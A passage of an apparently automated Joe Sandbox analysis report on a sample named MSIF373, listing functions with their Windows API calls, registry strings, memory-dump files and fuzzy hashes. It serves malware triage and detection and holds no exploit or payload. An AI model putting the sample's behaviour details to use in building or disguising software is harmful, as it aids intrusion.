                                                                                          • RegCloseKey.ADVAPI32(?,DE64E134), ref: 00598C25
                                                                                          • DeleteCriticalSection.KERNEL32 ref: 00598C37
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close$CriticalDeleteSection
                                                                                          • String ID:
                                                                                          • API String ID: 688834588-0
                                                                                          • Opcode ID: dc674cae351e15b719431fbc6f7048bac9b96c81b7275d06e405b025f6eec58d
                                                                                          • Instruction ID: ec77fbca2d10d7ff6b44027c932a5bfd99c425a98adfa51da5441e51321cef1d
                                                                                          • Opcode Fuzzy Hash: dc674cae351e15b719431fbc6f7048bac9b96c81b7275d06e405b025f6eec58d
                                                                                          • Instruction Fuzzy Hash: 301172B2A04605ABC714DF69DD85E9BF7EDFB49710F044919F819D3740DB34F9008A61
                                                                                          Function 005D48B0 Relevance: 6.1, APIs: 4, Instructions: 65registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000008,?), ref: 005D48F5
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 005D4936
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumOpen
                                                                                          • String ID:
                                                                                          • API String ID: 3231578192-0
                                                                                          • Opcode ID: 169b705c05b9fbb534090ce8124ef5f9d5ec4b56d7e11ccf91935d57e5ae2494
                                                                                          • Instruction ID: 3866092a0947ba4257e6e082277e3a336df46593ba23dbd8a650725d547786d1
                                                                                          • Opcode Fuzzy Hash: 169b705c05b9fbb534090ce8124ef5f9d5ec4b56d7e11ccf91935d57e5ae2494
                                                                                          • Instruction Fuzzy Hash: 13111D75901228ABC725DF65DC94AEABB7DFB49711F04819EF50992200DA705F848FA0
                                                                                          Function 005B0EC0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 005B0EFB
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 005B0F20
                                                                                          Strings
                                                                                          • codepage == CP_ACP || codepage == CP_UTF8, xrefs: 005B0EE1
                                                                                          • ..\CTL32\NSMString.cpp, xrefs: 005B0EDC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide
                                                                                          • String ID: ..\CTL32\NSMString.cpp$codepage == CP_ACP || codepage == CP_UTF8
                                                                                          • API String ID: 626452242-274046628
                                                                                          • Opcode ID: 9acc5e709b161b6acc12d5ef4ef8225980836b173b13f3d5c67443f5c44f41b0
                                                                                          • Instruction ID: 3eae2e8d2d170ad97e4358d57d7a0dbf3d29e1fe9ab9824f9b5c0ed728fec324
                                                                                          • Opcode Fuzzy Hash: 9acc5e709b161b6acc12d5ef4ef8225980836b173b13f3d5c67443f5c44f41b0
                                                                                          • Instruction Fuzzy Hash: E701D2715043067FD7209B59CC8AF97BB9CFB54724F148626F91AC76C0E670F901CA60
                                                                                          Function 005F2A21 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DecodePointer.KERNEL32(00000006,005F2EC4,?,005ED3F0), ref: 005F2A32
                                                                                          • TlsFree.KERNEL32(00000016,005F2EC4,?,005ED3F0), ref: 005F2A4C
                                                                                          • DeleteCriticalSection.KERNEL32(00000000,00000000,77485730,?,005F2EC4,?,005ED3F0), ref: 005F91BF
                                                                                          • DeleteCriticalSection.KERNEL32(00000016,77485730,?,005F2EC4,?,005ED3F0), ref: 005F91E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalDeleteSection$DecodeFreePointer
                                                                                          • String ID:
                                                                                          • API String ID: 1592661152-0
                                                                                          • Opcode ID: 6ca8a0e65b1e332e97aa5226ada6c30b13da72c4e03e6d8c79823ac849337903
                                                                                          • Instruction ID: 8ee0e7d3fa85232219893dbfc053004035de51ffe93f66dcf9d18199d0119494
                                                                                          • Opcode Fuzzy Hash: 6ca8a0e65b1e332e97aa5226ada6c30b13da72c4e03e6d8c79823ac849337903
                                                                                          • Instruction Fuzzy Hash: F3019631800A1797C7349F299C8DDB67AEABB81734715563AE9B5D31F0C7789C42CAB0
                                                                                          Function 005E0B30 Relevance: 6.0, APIs: 4, Instructions: 50threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 005E0B4C
                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?), ref: 005E0B5C
                                                                                          • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,?), ref: 005E0B75
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 005E0B92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseFullHandleImageNameOpenQueryThreadWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2863166696-0
                                                                                          • Opcode ID: 6be1f58bce75d85c3ada7b86c194747e661e31f9360b2010321e479590536b43
                                                                                          • Instruction ID: 740d59b59e6f1808c63113fea297f45b0601c164c8ea29385d180f4555fa9dc5
                                                                                          • Opcode Fuzzy Hash: 6be1f58bce75d85c3ada7b86c194747e661e31f9360b2010321e479590536b43
                                                                                          • Instruction Fuzzy Hash: 51017172500249BF9B149F65DC94DEF7BBDFF49755B04D01AF90887280D6709E008BB0
                                                                                          Function 005C2540 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetBkColor.GDI32(?,?), ref: 005C2561
                                                                                          • SetRect.USER32(?,?,?,?,?), ref: 005C2579
                                                                                          • ExtTextOutW.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 005C2590
                                                                                          • SetBkColor.GDI32(?,00000000), ref: 005C2598
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Color$RectText
                                                                                          • String ID:
                                                                                          • API String ID: 4034337308-0
                                                                                          • Opcode ID: 828f2bd5000eb83e085d340b1b66b16eb3116a7fcbe429202b845a4c9e448a7a
                                                                                          • Instruction ID: 0e411f87e6a010b7bcb6d5fbf9f1590aea01dcecf053b3e862098ad064c180c8
                                                                                          • Opcode Fuzzy Hash: 828f2bd5000eb83e085d340b1b66b16eb3116a7fcbe429202b845a4c9e448a7a
                                                                                          • Instruction Fuzzy Hash: D2011E76601209BBD700DFA9DC46FEB73ADEB49710F104059FA05A7190DA70AD018BB5
                                                                                          Function 005F2B12 Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000000,?,005ECFCC,005E7D2D,752F55F0,?,005B97EE,00000000,?,?), ref: 005F2B16
                                                                                            • Part of subcall function 005F29D0: TlsGetValue.KERNEL32(?,005F2B29,?,005B97EE,00000000,?,?), ref: 005F29D9
                                                                                            • Part of subcall function 005F29D0: DecodePointer.KERNEL32(?,005B97EE,00000000,?,?), ref: 005F29EB
                                                                                            • Part of subcall function 005F29D0: TlsSetValue.KERNEL32(00000000,?,005B97EE,00000000,?,?), ref: 005F29FA
                                                                                          • SetLastError.KERNEL32(00000000,?,005B97EE,00000000,?,?), ref: 005F2B80
                                                                                            • Part of subcall function 005F5B13: Sleep.KERNEL32(00000000,00000000,?,?), ref: 005F5B3B
                                                                                          • DecodePointer.KERNEL32(00000000,?,005B97EE,00000000,?,?), ref: 005F2B52
                                                                                            • Part of subcall function 005F2A5E: GetModuleHandleW.KERNEL32(KERNEL32.DLL,00633318,00000008,005F2B66,00000000,00000000,?,005B97EE,00000000,?,?), ref: 005F2A6F
                                                                                            • Part of subcall function 005F2A5E: InterlockedIncrement.KERNEL32(00638D80), ref: 005F2AB0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F2B68
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DecodeErrorLastPointerValue$CurrentHandleIncrementInterlockedModuleSleepThread
                                                                                          • String ID:
                                                                                          • API String ID: 68510339-0
                                                                                          • Opcode ID: 30debe8a4d97c82ad58caf3d01cd1e1a617b892a0bccc00a327816c246920945
                                                                                          • Instruction ID: f72609acf8d3c519a67a750d2991cb2e554b965d38fd50664dc7a61826f35584
                                                                                          • Opcode Fuzzy Hash: 30debe8a4d97c82ad58caf3d01cd1e1a617b892a0bccc00a327816c246920945
                                                                                          • Instruction Fuzzy Hash: 66F022329056276FCB352B78BC0EAAA3FD6FF81770F144506FA55E20E5DF69880186E4
                                                                                          Function 005B4260 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetParent.USER32(?), ref: 005B4276
                                                                                          • GetWindowRect.USER32(?,?), ref: 005B4283
                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 005B4292
                                                                                          • MoveWindow.USER32(?,?,?,?,?,?), ref: 005B42AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$MoveParentPointsRect
                                                                                          • String ID:
                                                                                          • API String ID: 868478971-0
                                                                                          • Opcode ID: 3490cf49a1120323389557967879cfd0ded504f0cb39669b0077c204098f2755
                                                                                          • Instruction ID: 03703dd206889535d0d34b6c4c92d3749bde0c6451efa21048e6596516700c7b
                                                                                          • Opcode Fuzzy Hash: 3490cf49a1120323389557967879cfd0ded504f0cb39669b0077c204098f2755
                                                                                          • Instruction Fuzzy Hash: BF014F71601158AFDB01DF95DD19DFF77BEEB89710F048059F905A3240DA30AE018BB2
                                                                                          Function 005BB080 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005BB08E
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,0063C2FC,?,005CBA0F,00000000,?,005B6949,00000847), ref: 005BB098
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,005CBA0F,00000000,?,005B6949,00000847), ref: 005BB0B8
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,005CBA0F,00000000,?,005B6949,00000847), ref: 005BB0CC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Leave$CurrentEnterThread
                                                                                          • String ID:
                                                                                          • API String ID: 2905768538-0
                                                                                          • Opcode ID: 2e59016fb81bed39de0fe20b8bc26cd3083d9dd14bd47f8c04a134f6ea0bb796
                                                                                          • Instruction ID: 0b7541cbd5c880a944688f586f2925e1e164f4fdd73b1dcfd68fba6a7a5bc3cc
                                                                                          • Opcode Fuzzy Hash: 2e59016fb81bed39de0fe20b8bc26cd3083d9dd14bd47f8c04a134f6ea0bb796
                                                                                          • Instruction Fuzzy Hash: A2F0CD36200108AFCB10EF58EC588EABBA9FF95352B14816BF911C3250DB70A905CBF0
                                                                                          Function 005F2CD4 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32 ref: 005F2CF5
                                                                                          • TlsGetValue.KERNEL32 ref: 005F2D07
                                                                                          • DecodePointer.KERNEL32(00000000), ref: 005F2D1D
                                                                                          • TlsSetValue.KERNEL32(00000016,00000000), ref: 005F2D3A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Value$DecodePointer
                                                                                          • String ID:
                                                                                          • API String ID: 721062344-0
                                                                                          • Opcode ID: d1129dc9ab20e2cd4d5b1b5a897b24534dc0abf275b1e40bb9744b5620652fa1
                                                                                          • Instruction ID: 3ec0dddb8bb0bf82740b79d30f63aa3588d450635eddb035cf9594940f02859a
                                                                                          • Opcode Fuzzy Hash: d1129dc9ab20e2cd4d5b1b5a897b24534dc0abf275b1e40bb9744b5620652fa1
                                                                                          • Instruction Fuzzy Hash: 42F06D7040020AEFDB115F64ED88BA93FE7FB40324F14A111F52A961B1CB749A63CEA0
                                                                                          Function 005AC620 Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,00002328,?,?,00593B1B), ref: 005AC643
                                                                                          • SetEvent.KERNEL32(?,?,?,00593B1B), ref: 005AC649
                                                                                          • WaitForSingleObject.KERNEL32(?,00002710,?,?,00593B1B), ref: 005AC658
                                                                                          • CloseHandle.KERNEL32(?,?,?,00593B1B), ref: 005AC65E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ObjectSingleWait$CloseEventHandle
                                                                                          • String ID:
                                                                                          • API String ID: 1408678129-0
                                                                                          • Opcode ID: d35a4b1cce8acc477387d484699b935b1eec875a5812849cc6d6b605e63a1412
                                                                                          • Instruction ID: cb20b8788ee7ec1b3c71bd9b23b5879e533c9093e13dc5796c0b2662738ea088
                                                                                          • Opcode Fuzzy Hash: d35a4b1cce8acc477387d484699b935b1eec875a5812849cc6d6b605e63a1412
                                                                                          • Instruction Fuzzy Hash: 2EF089712007009BC324DB69C854A5BFBEAAF9CB10B08890EE15A87691CBB5F440CB60
                                                                                          Function 0059A380 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 0059A3D6
                                                                                            • Part of subcall function 005B49E0: RegCreateKeyExW.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,005959EC,?,00000000,?,00000000,752F55F0,?,?,005959EC,80000001), ref: 005B4A0B
                                                                                            • Part of subcall function 005B4B90: RegQueryValueExW.ADVAPI32(00020019,?,00000000,80000002,80000002,00020019,00000000,752F55F0,00000010,?,?,005963B6,?,?,?,80000002), ref: 005B4BB8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateQueryValuewsprintf
                                                                                          • String ID: SYSTEM\CurrentControlSet\Control\Class\%s$UpperFilters
                                                                                          • API String ID: 198545541-1035810585
                                                                                          • Opcode ID: 273cba56f83bed1a10dc442bf9a0877e8c88ecedf2df33b34b9d1b27e39a51ca
                                                                                          • Instruction ID: 5ee2cfe2207f459c43fa92f1c0431fe47e8a9ae81e038a28e7d10f95098352a8
                                                                                          • Opcode Fuzzy Hash: 273cba56f83bed1a10dc442bf9a0877e8c88ecedf2df33b34b9d1b27e39a51ca
                                                                                          • Instruction Fuzzy Hash: 57712831A002199BCF24DF18CC85AFABBB6FF84304F558599E84A97245E770AF85CBD1
                                                                                          Function 00592350 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 143COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf
                                                                                          • String ID: Client$[%s]%c
                                                                                          • API String ID: 2111968516-4156239840
                                                                                          • Opcode ID: c70111e896fc13c9c877f754616cae23b9f10472fee0af180cfc7cdb88a59e8b
                                                                                          • Instruction ID: 0b3b85ac55a9d8697a83512c64a27a7c5439b9044c3cb7c2acb6a309b82fb30a
                                                                                          • Opcode Fuzzy Hash: c70111e896fc13c9c877f754616cae23b9f10472fee0af180cfc7cdb88a59e8b
                                                                                          • Instruction Fuzzy Hash: D041E575A00206AACF24EF65CC56BE777B5FF98304F0445A4E94DDB256FB70AA80C790
                                                                                          Function 005B4C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 005B4C71
                                                                                          • RegQueryValueExW.ADVAPI32(000007FE,?,00000000,?,00000000,000007FE), ref: 005B4CCC
                                                                                            • Part of subcall function 005E79A7: HeapFree.KERNEL32(00000000,00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79BD
                                                                                            • Part of subcall function 005E79A7: GetLastError.KERNEL32(00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79CF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
